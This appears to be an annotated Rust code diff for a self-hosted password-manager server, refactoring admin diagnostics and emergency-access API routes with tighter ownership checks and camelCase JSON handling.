-                seconds = ntp_time.seconds
-            );
+        if let Ok(cf_trace) = get_text_api("https://cloudflare.com/cdn-cgi/trace").await {
+            for line in cf_trace.lines() {
+                if let Some((key, value)) = line.split_once('=') {
+                    if key == "ts" {
+                        let ts = value.split_once('.').map_or(value, |(s, _)| s);
+                        if let Ok(dt) = chrono::DateTime::parse_from_str(ts, "%s") {
+                            return dt.format("%Y-%m-%d %H:%M:%S UTC").to_string();
+                        }
+                        break;
+                    }
+                }
+            }
         }
     }
     String::from("Unable to fetch NTP time.")
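The rewritten time check parses the `ts=` line of Cloudflare's plain-text `/cdn-cgi/trace` response rather than calling a JSON time API. A self-contained sketch of the same parsing logic against a canned trace body (the sample values are made up):

```rust
fn parse_trace_ts(cf_trace: &str) -> Option<String> {
    for line in cf_trace.lines() {
        if let Some((key, value)) = line.split_once('=') {
            if key == "ts" {
                // Drop the fractional seconds; chrono's "%s" wants a whole UNIX timestamp.
                let ts = value.split_once('.').map_or(value, |(s, _)| s);
                return chrono::DateTime::parse_from_str(ts, "%s")
                    .ok()
                    .map(|dt| dt.format("%Y-%m-%d %H:%M:%S UTC").to_string());
            }
        }
    }
    None
}

fn main() {
    let sample = "fl=123abc\nip=203.0.113.7\nts=1712345678.123\nvisit_scheme=https";
    assert_eq!(parse_trace_ts(sample).as_deref(), Some("2024-04-05 19:34:38 UTC"));
}
```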
@@ -668,18 +669,6 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
     use chrono::prelude::*;
     use std::net::ToSocketAddrs;
 
-    // Get current running versions
-    let web_vault_version: WebVaultVersion =
-        match std::fs::read_to_string(format!("{}/{}", CONFIG.web_vault_folder(), "vw-version.json")) {
-            Ok(s) => serde_json::from_str(&s)?,
-            _ => match std::fs::read_to_string(format!("{}/{}", CONFIG.web_vault_folder(), "version.json")) {
-                Ok(s) => serde_json::from_str(&s)?,
-                _ => WebVaultVersion {
-                    version: String::from("Version file missing"),
-                },
-            },
-        };
-
     // Execute some environment checks
     let running_within_container = is_running_in_container();
     let has_http_access = has_http_access().await;
@@ -694,12 +683,21 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
         _ => "Unable to resolve domain name.".to_string(),
     };
 
-    let (latest_release, latest_commit, latest_web_build) =
-        get_release_info(has_http_access, running_within_container).await;
+    let (latest_release, latest_commit, latest_web_build) = get_release_info(has_http_access).await;
 
-    let ip_header_name = match &ip_header.0 {
-        Some(h) => h,
-        _ => "",
+    let ip_header_name = &ip_header.0.unwrap_or_default();
+
+    // Get current running versions
+    let web_vault_version = get_web_vault_version();
+
+    // Check if the running version is newer than the latest stable released version
+    let web_vault_pre_release = if let Ok(web_ver_match) = semver::VersionReq::parse(&format!(">{latest_web_build}")) {
+        web_ver_match.matches(
+            &semver::Version::parse(&web_vault_version).unwrap_or_else(|_| semver::Version::parse("2025.1.1").unwrap()),
+        )
+    } else {
+        error!("Unable to parse latest_web_build: '{latest_web_build}'");
+        false
     };
 
     let diagnostics_json = json!({
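The pre-release check builds a `VersionReq` of the form `>LATEST` and tests the running web-vault version against it, falling back to a hard-coded version when parsing fails so the comparison cannot panic. A small illustration of the matching rule, with placeholder version numbers:

```rust
use semver::{Version, VersionReq};

fn main() {
    // ">2024.6.2" matches anything strictly newer than the latest stable build.
    let newer_than_latest = VersionReq::parse(">2024.6.2").unwrap();

    assert!(newer_than_latest.matches(&Version::parse("2024.6.3").unwrap()));
    assert!(!newer_than_latest.matches(&Version::parse("2024.6.2").unwrap()));
    assert!(!newer_than_latest.matches(&Version::parse("2024.5.0").unwrap()));
}
```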
@@ -708,22 +706,25 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
         "latest_release": latest_release,
         "latest_commit": latest_commit,
         "web_vault_enabled": &CONFIG.web_vault_enabled(),
-        "web_vault_version": web_vault_version.version.trim_start_matches('v'),
+        "web_vault_version": web_vault_version,
         "latest_web_build": latest_web_build,
+        "web_vault_pre_release": web_vault_pre_release,
         "running_within_container": running_within_container,
         "container_base_image": if running_within_container { container_base_image() } else { "Not applicable" },
         "has_http_access": has_http_access,
-        "ip_header_exists": &ip_header.0.is_some(),
-        "ip_header_match": ip_header_name == CONFIG.ip_header(),
+        "ip_header_exists": !ip_header_name.is_empty(),
+        "ip_header_match": ip_header_name.eq(&CONFIG.ip_header()),
         "ip_header_name": ip_header_name,
         "ip_header_config": &CONFIG.ip_header(),
         "uses_proxy": uses_proxy,
+        "enable_websocket": &CONFIG.enable_websocket(),
         "db_type": *DB_TYPE,
         "db_version": get_sql_server_version(&mut conn).await,
         "admin_url": format!("{}/diagnostics", admin_url()),
         "overrides": &CONFIG.get_overrides().join(", "),
-        "host_arch": std::env::consts::ARCH,
-        "host_os": std::env::consts::OS,
+        "host_arch": env::consts::ARCH,
+        "host_os": env::consts::OS,
+        "tz_env": env::var("TZ").unwrap_or_default(),
         "server_time_local": Local::now().format("%Y-%m-%d %H:%M:%S %Z").to_string(),
         "server_time": Utc::now().format("%Y-%m-%d %H:%M:%S UTC").to_string(), // Run the server date/time check as late as possible to minimize the time difference
         "ntp_time": get_ntp_time(has_http_access).await, // Run the ntp check as late as possible to minimize the time difference
@@ -733,27 +734,41 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
     Ok(Html(text))
 }
 
-#[get("/diagnostics/config")]
+#[get("/diagnostics/config", format = "application/json")]
 fn get_diagnostics_config(_token: AdminToken) -> Json<Value> {
     let support_json = CONFIG.get_support_json();
     Json(support_json)
 }
 
-#[post("/config", data = "<data>")]
-fn post_config(data: Json<ConfigBuilder>, _token: AdminToken) -> EmptyResult {
+#[get("/diagnostics/http?<code>")]
+fn get_diagnostics_http(code: u16, _token: AdminToken) -> EmptyResult {
+    err_code!(format!("Testing error {code} response"), code);
+}
+
+#[post("/config", format = "application/json", data = "<data>")]
+async fn post_config(data: Json<ConfigBuilder>, _token: AdminToken) -> EmptyResult {
     let data: ConfigBuilder = data.into_inner();
-    CONFIG.update_config(data)
+    if let Err(e) = CONFIG.update_config(data, true).await {
+        err!(format!("Unable to save config: {e:?}"))
+    }
+    Ok(())
 }
 
-#[post("/config/delete")]
-fn delete_config(_token: AdminToken) -> EmptyResult {
-    CONFIG.delete_user_config()
+#[post("/config/delete", format = "application/json")]
+async fn delete_config(_token: AdminToken) -> EmptyResult {
+    if let Err(e) = CONFIG.delete_user_config().await {
+        err!(format!("Unable to delete config: {e:?}"))
+    }
+    Ok(())
 }
 
-#[post("/config/backup_db")]
-async fn backup_db(_token: AdminToken, mut conn: DbConn) -> EmptyResult {
+#[post("/config/backup_db", format = "application/json")]
+async fn backup_db(_token: AdminToken, mut conn: DbConn) -> ApiResult<String> {
     if *CAN_BACKUP {
-        backup_database(&mut conn).await
+        match backup_database(&mut conn).await {
+            Ok(f) => Ok(format!("Backup to '{f}' was successful")),
+            Err(e) => err!(format!("Backup was unsuccessful {e}")),
+        }
     } else {
         err!("Can't back up current DB (Only SQLite supports this feature)");
     }
File diff suppressed because it is too large
@@ -1,11 +1,11 @@
-use chrono::{Duration, Utc};
+use chrono::{TimeDelta, Utc};
 use rocket::{serde::json::Json, Route};
 use serde_json::Value;
 
 use crate::{
     api::{
         core::{CipherSyncData, CipherSyncType},
-        EmptyResult, JsonResult, JsonUpcase,
+        EmptyResult, JsonResult,
     },
     auth::{decode_emergency_access_invite, Headers},
     db::{models::*, DbConn, DbPool},
@@ -43,31 +43,33 @@ pub fn routes() -> Vec<Route> {
 async fn get_contacts(headers: Headers, mut conn: DbConn) -> Json<Value> {
     if !CONFIG.emergency_access_allowed() {
         return Json(json!({
-            "Data": [{
-                "Id": "",
-                "Status": 2,
-                "Type": 0,
-                "WaitTimeDays": 0,
-                "GranteeId": "",
-                "Email": "",
-                "Name": "NOTE: Emergency Access is disabled!",
-                "Object": "emergencyAccessGranteeDetails",
+            "data": [{
+                "id": "",
+                "status": 2,
+                "type": 0,
+                "waitTimeDays": 0,
+                "granteeId": "",
+                "email": "",
+                "name": "NOTE: Emergency Access is disabled!",
+                "object": "emergencyAccessGranteeDetails",
             }],
-            "Object": "list",
-            "ContinuationToken": null
+            "object": "list",
+            "continuationToken": null
         }));
     }
     let emergency_access_list = EmergencyAccess::find_all_by_grantor_uuid(&headers.user.uuid, &mut conn).await;
     let mut emergency_access_list_json = Vec::with_capacity(emergency_access_list.len());
     for ea in emergency_access_list {
-        emergency_access_list_json.push(ea.to_json_grantee_details(&mut conn).await);
+        if let Some(grantee) = ea.to_json_grantee_details(&mut conn).await {
+            emergency_access_list_json.push(grantee)
+        }
     }
 
     Json(json!({
-        "Data": emergency_access_list_json,
-        "Object": "list",
-        "ContinuationToken": null
+        "data": emergency_access_list_json,
+        "object": "list",
+        "continuationToken": null
     }))
 }
 
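The casing change running through this whole PR: response keys move from `PascalCase` to `camelCase`, and request structs trade `#[allow(non_snake_case)]` fields for snake_case fields plus `#[serde(rename_all = "camelCase")]`. A round-trip sketch of the attribute (the struct and values are illustrative only):

```rust
use serde::Deserialize;

#[derive(Debug, Deserialize)]
#[serde(rename_all = "camelCase")]
struct UpdateData {
    wait_time_days: i32,           // accepts "waitTimeDays" on the wire
    key_encrypted: Option<String>, // accepts "keyEncrypted"
}

fn main() {
    let body = r#"{ "waitTimeDays": 7, "keyEncrypted": null }"#;
    let data: UpdateData = serde_json::from_str(body).unwrap();
    assert_eq!(data.wait_time_days, 7);
    assert!(data.key_encrypted.is_none());
}
```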
@@ -84,18 +86,20 @@ async fn get_grantees(headers: Headers, mut conn: DbConn) -> Json<Value> {
     }
 
     Json(json!({
-        "Data": emergency_access_list_json,
-        "Object": "list",
-        "ContinuationToken": null
+        "data": emergency_access_list_json,
+        "object": "list",
+        "continuationToken": null
     }))
 }
 
 #[get("/emergency-access/<emer_id>")]
-async fn get_emergency_access(emer_id: &str, mut conn: DbConn) -> JsonResult {
+async fn get_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
     check_emergency_access_enabled()?;
 
-    match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emergency_access) => Ok(Json(emergency_access.to_json_grantee_details(&mut conn).await)),
+    match EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await {
+        Some(emergency_access) => Ok(Json(
+            emergency_access.to_json_grantee_details(&mut conn).await.expect("Grantee user should exist but does not!"),
+        )),
         None => err!("Emergency access not valid."),
     }
 }
@@ -105,42 +109,49 @@ async fn get_emergency_access(emer_id: &str, mut conn: DbConn) -> JsonResult {
 // region put/post
 
 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct EmergencyAccessUpdateData {
-    Type: NumberOrString,
-    WaitTimeDays: i32,
-    KeyEncrypted: Option<String>,
+    r#type: NumberOrString,
+    wait_time_days: i32,
+    key_encrypted: Option<String>,
 }
 
 #[put("/emergency-access/<emer_id>", data = "<data>")]
-async fn put_emergency_access(emer_id: &str, data: JsonUpcase<EmergencyAccessUpdateData>, conn: DbConn) -> JsonResult {
-    post_emergency_access(emer_id, data, conn).await
+async fn put_emergency_access(
+    emer_id: EmergencyAccessId,
+    data: Json<EmergencyAccessUpdateData>,
+    headers: Headers,
+    conn: DbConn,
+) -> JsonResult {
+    post_emergency_access(emer_id, data, headers, conn).await
 }
 
 #[post("/emergency-access/<emer_id>", data = "<data>")]
 async fn post_emergency_access(
-    emer_id: &str,
-    data: JsonUpcase<EmergencyAccessUpdateData>,
+    emer_id: EmergencyAccessId,
+    data: Json<EmergencyAccessUpdateData>,
+    headers: Headers,
     mut conn: DbConn,
 ) -> JsonResult {
     check_emergency_access_enabled()?;
 
-    let data: EmergencyAccessUpdateData = data.into_inner().data;
+    let data: EmergencyAccessUpdateData = data.into_inner();
 
-    let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emergency_access) => emergency_access,
-        None => err!("Emergency access not valid."),
+    let Some(mut emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };
 
-    let new_type = match EmergencyAccessType::from_str(&data.Type.into_string()) {
+    let new_type = match EmergencyAccessType::from_str(&data.r#type.into_string()) {
         Some(new_type) => new_type as i32,
         None => err!("Invalid emergency access type."),
     };
 
     emergency_access.atype = new_type;
-    emergency_access.wait_time_days = data.WaitTimeDays;
-    if data.KeyEncrypted.is_some() {
-        emergency_access.key_encrypted = data.KeyEncrypted;
+    emergency_access.wait_time_days = data.wait_time_days;
+    if data.key_encrypted.is_some() {
+        emergency_access.key_encrypted = data.key_encrypted;
     }
 
     emergency_access.save(&mut conn).await?;
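One wrinkle in the struct above: `type` is a Rust keyword, so the camelCase field has to be spelled with the raw-identifier prefix `r#`; serde strips the prefix, so the wire name stays plain `type`. A tiny sketch:

```rust
use serde::Deserialize;

#[derive(Debug, Deserialize)]
struct Payload {
    // Named `type` in JSON, `r#type` in Rust source.
    r#type: u8,
}

fn main() {
    let p: Payload = serde_json::from_str(r#"{ "type": 3 }"#).unwrap();
    assert_eq!(p.r#type, 3);
}
```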
@@ -152,26 +163,30 @@ async fn post_emergency_access(
 // region delete
 
 #[delete("/emergency-access/<emer_id>")]
-async fn delete_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> EmptyResult {
+async fn delete_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> EmptyResult {
     check_emergency_access_enabled()?;
 
-    let grantor_user = headers.user;
-
-    let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => {
-            if emer.grantor_uuid != grantor_user.uuid && emer.grantee_uuid != Some(grantor_user.uuid) {
-                err!("Emergency access not valid.")
-            }
-            emer
-        }
-        None => err!("Emergency access not valid."),
+    let emergency_access = match (
+        EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await,
+        EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &headers.user.uuid, &mut conn).await,
+    ) {
+        (Some(grantor_emer), None) => {
+            info!("Grantor deleted emergency access {emer_id}");
+            grantor_emer
+        }
+        (None, Some(grantee_emer)) => {
+            info!("Grantee deleted emergency access {emer_id}");
+            grantee_emer
+        }
+        _ => err!("Emergency access not valid."),
     };
 
     emergency_access.delete(&mut conn).await?;
     Ok(())
 }
 
 #[post("/emergency-access/<emer_id>/delete")]
-async fn post_delete_emergency_access(emer_id: &str, headers: Headers, conn: DbConn) -> EmptyResult {
+async fn post_delete_emergency_access(emer_id: EmergencyAccessId, headers: Headers, conn: DbConn) -> EmptyResult {
     delete_emergency_access(emer_id, headers, conn).await
 }
 
@@ -180,24 +195,24 @@ async fn post_delete_emergency_access(emer_id: &str, headers: Headers, conn: DbC
 // region invite
 
 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct EmergencyAccessInviteData {
-    Email: String,
-    Type: NumberOrString,
-    WaitTimeDays: i32,
+    email: String,
+    r#type: NumberOrString,
+    wait_time_days: i32,
 }
 
 #[post("/emergency-access/invite", data = "<data>")]
-async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
+async fn send_invite(data: Json<EmergencyAccessInviteData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
     check_emergency_access_enabled()?;
 
-    let data: EmergencyAccessInviteData = data.into_inner().data;
-    let email = data.Email.to_lowercase();
-    let wait_time_days = data.WaitTimeDays;
+    let data: EmergencyAccessInviteData = data.into_inner();
+    let email = data.email.to_lowercase();
+    let wait_time_days = data.wait_time_days;
 
     let emergency_access_status = EmergencyAccessStatus::Invited as i32;
 
-    let new_type = match EmergencyAccessType::from_str(&data.Type.into_string()) {
+    let new_type = match EmergencyAccessType::from_str(&data.r#type.into_string()) {
         Some(new_type) => new_type as i32,
         None => err!("Invalid emergency access type."),
     };
@@ -209,10 +224,10 @@ async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Heade
         err!("You can not set yourself as an emergency contact.")
     }
 
-    let grantee_user = match User::find_by_mail(&email, &mut conn).await {
+    let (grantee_user, new_user) = match User::find_by_mail(&email, &mut conn).await {
         None => {
             if !CONFIG.invitations_allowed() {
-                err!(format!("Grantee user does not exist: {}", &email))
+                err!(format!("Grantee user does not exist: {email}"))
             }
 
             if !CONFIG.is_email_domain_allowed(&email) {
@@ -226,9 +241,10 @@ async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Heade
 
             let mut user = User::new(email.clone());
             user.save(&mut conn).await?;
-            user
+            (user, true)
         }
-        Some(user) => user,
+        Some(user) if user.password_hash.is_empty() => (user, true),
+        Some(user) => (user, false),
     };
 
     if EmergencyAccess::find_by_grantor_uuid_and_grantee_uuid_or_email(
@@ -250,51 +266,40 @@ async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Heade
     if CONFIG.mail_enabled() {
         mail::send_emergency_access_invite(
             &new_emergency_access.email.expect("Grantee email does not exists"),
-            &grantee_user.uuid,
-            &new_emergency_access.uuid,
+            grantee_user.uuid,
+            new_emergency_access.uuid,
             &grantor_user.name,
             &grantor_user.email,
         )
         .await?;
-    } else {
-        // Automatically mark user as accepted if no email invites
-        match User::find_by_mail(&email, &mut conn).await {
-            Some(user) => match accept_invite_process(&user.uuid, &mut new_emergency_access, &email, &mut conn).await {
-                Ok(v) => v,
-                Err(e) => err!(e.to_string()),
-            },
-            None => err!("Grantee user not found."),
-        }
+    } else if !new_user {
+        // if mail is not enabled immediately accept the invitation for existing users
+        new_emergency_access.accept_invite(&grantee_user.uuid, &email, &mut conn).await?;
     }
 
     Ok(())
 }
 
 #[post("/emergency-access/<emer_id>/reinvite")]
-async fn resend_invite(emer_id: &str, headers: Headers, mut conn: DbConn) -> EmptyResult {
+async fn resend_invite(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> EmptyResult {
     check_emergency_access_enabled()?;
 
-    let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(mut emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };
 
-    if emergency_access.grantor_uuid != headers.user.uuid {
-        err!("Emergency access not valid.");
-    }
-
     if emergency_access.status != EmergencyAccessStatus::Invited as i32 {
         err!("The grantee user is already accepted or confirmed to the organization");
     }
 
-    let email = match emergency_access.email.clone() {
-        Some(email) => email,
-        None => err!("Email not valid."),
+    let Some(email) = emergency_access.email.clone() else {
+        err!("Email not valid.")
     };
 
-    let grantee_user = match User::find_by_mail(&email, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantee user not found."),
+    let Some(grantee_user) = User::find_by_mail(&email, &mut conn).await else {
+        err!("Grantee user not found.")
     };
 
     let grantor_user = headers.user;
@@ -302,40 +307,40 @@ async fn resend_invite(emer_id: &str, headers: Headers, mut conn: DbConn) -> EmptyResult {
     if CONFIG.mail_enabled() {
         mail::send_emergency_access_invite(
             &email,
-            &grantor_user.uuid,
-            &emergency_access.uuid,
+            grantor_user.uuid,
+            emergency_access.uuid,
             &grantor_user.name,
             &grantor_user.email,
         )
         .await?;
-    } else {
-        if Invitation::find_by_mail(&email, &mut conn).await.is_none() {
-            let invitation = Invitation::new(&email);
-            invitation.save(&mut conn).await?;
-        }
-
-        // Automatically mark user as accepted if no email invites
-        match accept_invite_process(&grantee_user.uuid, &mut emergency_access, &email, &mut conn).await {
-            Ok(v) => v,
-            Err(e) => err!(e.to_string()),
-        }
+    } else if !grantee_user.password_hash.is_empty() {
+        // accept the invitation for existing user
+        emergency_access.accept_invite(&grantee_user.uuid, &email, &mut conn).await?;
+    } else if CONFIG.invitations_allowed() && Invitation::find_by_mail(&email, &mut conn).await.is_none() {
+        let invitation = Invitation::new(&email);
+        invitation.save(&mut conn).await?;
     }

     Ok(())
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct AcceptData {
-    Token: String,
+    token: String,
 }

 #[post("/emergency-access/<emer_id>/accept", data = "<data>")]
-async fn accept_invite(emer_id: &str, data: JsonUpcase<AcceptData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
+async fn accept_invite(
+    emer_id: EmergencyAccessId,
+    data: Json<AcceptData>,
+    headers: Headers,
+    mut conn: DbConn,
+) -> EmptyResult {
     check_emergency_access_enabled()?;

-    let data: AcceptData = data.into_inner().data;
-    let token = &data.Token;
+    let data: AcceptData = data.into_inner();
+    let token = &data.token;
     let claims = decode_emergency_access_invite(token)?;

     // This can happen if the user who received the invite used a different email to signup.
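Note: `AcceptData` above shows the other recurring migration: the custom `JsonUpcase` extractor and PascalCase fields (silenced with `#[allow(non_snake_case)]`) give way to Rocket's plain `Json` plus snake_case fields and `#[serde(rename_all = "camelCase")]`, matching the camelCase JSON the newer Bitwarden clients send. A minimal sketch, assuming serde and serde_json as dependencies:

    use serde::Deserialize;

    #[derive(Deserialize)]
    #[serde(rename_all = "camelCase")]
    struct AcceptData {
        token: String, // filled from the JSON key "token"
    }

    fn parse(raw: &str) -> AcceptData {
        serde_json::from_str(raw).unwrap() // e.g. raw = r#"{"token":"abc"}"#
    }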
@@ -352,25 +357,24 @@ async fn accept_invite(emer_id: &str, data: JsonUpcase<AcceptData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
         None => err!("Invited user not found"),
     };

-    let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    // We need to search for the uuid in combination with the email, since we do not yet store the uuid of the grantee in the database.
+    // The uuid of the grantee gets stored once accepted.
+    let Some(mut emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantee_email(&emer_id, &headers.user.email, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

     // get grantor user to send Accepted email
-    let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
+    let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
+        err!("Grantor user not found.")
     };

     if emer_id == claims.emer_id
         && grantor_user.name == claims.grantor_name
         && grantor_user.email == claims.grantor_email
     {
-        match accept_invite_process(&grantee_user.uuid, &mut emergency_access, &grantee_user.email, &mut conn).await {
-            Ok(v) => v,
-            Err(e) => err!(e.to_string()),
-        }
+        emergency_access.accept_invite(&grantee_user.uuid, &grantee_user.email, &mut conn).await?;

         if CONFIG.mail_enabled() {
             mail::send_emergency_access_invite_accepted(&grantor_user.email, &grantee_user.email).await?;
@@ -382,48 +386,29 @@ async fn accept_invite(emer_id: &str, data: JsonUpcase<AcceptData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
     }
 }

-async fn accept_invite_process(
-    grantee_uuid: &str,
-    emergency_access: &mut EmergencyAccess,
-    grantee_email: &str,
-    conn: &mut DbConn,
-) -> EmptyResult {
-    if emergency_access.email.is_none() || emergency_access.email.as_ref().unwrap() != grantee_email {
-        err!("User email does not match invite.");
-    }
-
-    if emergency_access.status == EmergencyAccessStatus::Accepted as i32 {
-        err!("Emergency contact already accepted.");
-    }
-
-    emergency_access.status = EmergencyAccessStatus::Accepted as i32;
-    emergency_access.grantee_uuid = Some(String::from(grantee_uuid));
-    emergency_access.email = None;
-    emergency_access.save(conn).await
-}
-
 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct ConfirmData {
-    Key: String,
+    key: String,
 }

 #[post("/emergency-access/<emer_id>/confirm", data = "<data>")]
 async fn confirm_emergency_access(
-    emer_id: &str,
-    data: JsonUpcase<ConfirmData>,
+    emer_id: EmergencyAccessId,
+    data: Json<ConfirmData>,
     headers: Headers,
     mut conn: DbConn,
 ) -> JsonResult {
     check_emergency_access_enabled()?;

     let confirming_user = headers.user;
-    let data: ConfirmData = data.into_inner().data;
-    let key = data.Key;
+    let data: ConfirmData = data.into_inner();
+    let key = data.key;

-    let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(mut emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &confirming_user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

     if emergency_access.status != EmergencyAccessStatus::Accepted as i32
@@ -432,15 +417,13 @@ async fn confirm_emergency_access(
         err!("Emergency access not valid.")
     }

-    let grantor_user = match User::find_by_uuid(&confirming_user.uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
+    let Some(grantor_user) = User::find_by_uuid(&confirming_user.uuid, &mut conn).await else {
+        err!("Grantor user not found.")
     };

     if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
-        let grantee_user = match User::find_by_uuid(grantee_uuid, &mut conn).await {
-            Some(user) => user,
-            None => err!("Grantee user not found."),
+        let Some(grantee_user) = User::find_by_uuid(grantee_uuid, &mut conn).await else {
+            err!("Grantee user not found.")
         };

         emergency_access.status = EmergencyAccessStatus::Confirmed as i32;
@@ -463,24 +446,22 @@ async fn confirm_emergency_access(
 // region access emergency access

 #[post("/emergency-access/<emer_id>/initiate")]
-async fn initiate_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn initiate_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
     check_emergency_access_enabled()?;

     let initiating_user = headers.user;
-    let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(mut emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &initiating_user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

-    if emergency_access.status != EmergencyAccessStatus::Confirmed as i32
-        || emergency_access.grantee_uuid != Some(initiating_user.uuid)
-    {
+    if emergency_access.status != EmergencyAccessStatus::Confirmed as i32 {
         err!("Emergency access not valid.")
     }

-    let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
+    let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
+        err!("Grantor user not found.")
     };

     let now = Utc::now().naive_utc();
@@ -503,29 +484,26 @@ async fn initiate_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
 }

 #[post("/emergency-access/<emer_id>/approve")]
-async fn approve_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn approve_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
     check_emergency_access_enabled()?;

-    let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(mut emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

-    if emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32
-        || emergency_access.grantor_uuid != headers.user.uuid
-    {
+    if emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32 {
         err!("Emergency access not valid.")
     }

-    let grantor_user = match User::find_by_uuid(&headers.user.uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
+    let Some(grantor_user) = User::find_by_uuid(&headers.user.uuid, &mut conn).await else {
+        err!("Grantor user not found.")
     };

     if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
-        let grantee_user = match User::find_by_uuid(grantee_uuid, &mut conn).await {
-            Some(user) => user,
-            None => err!("Grantee user not found."),
+        let Some(grantee_user) = User::find_by_uuid(grantee_uuid, &mut conn).await else {
+            err!("Grantee user not found.")
         };

         emergency_access.status = EmergencyAccessStatus::RecoveryApproved as i32;
@@ -541,37 +519,31 @@ async fn approve_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
 }

 #[post("/emergency-access/<emer_id>/reject")]
-async fn reject_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn reject_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
     check_emergency_access_enabled()?;

-    let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
-        Some(emer) => emer,
-        None => err!("Emergency access not valid."),
+    let Some(mut emergency_access) =
+        EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
+    else {
+        err!("Emergency access not valid.")
     };

-    if (emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32
-        && emergency_access.status != EmergencyAccessStatus::RecoveryApproved as i32)
-        || emergency_access.grantor_uuid != headers.user.uuid
+    if emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32
+        && emergency_access.status != EmergencyAccessStatus::RecoveryApproved as i32
     {
         err!("Emergency access not valid.")
     }

-    let grantor_user = match User::find_by_uuid(&headers.user.uuid, &mut conn).await {
-        Some(user) => user,
-        None => err!("Grantor user not found."),
-    };
-
     if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
-        let grantee_user = match User::find_by_uuid(grantee_uuid, &mut conn).await {
-            Some(user) => user,
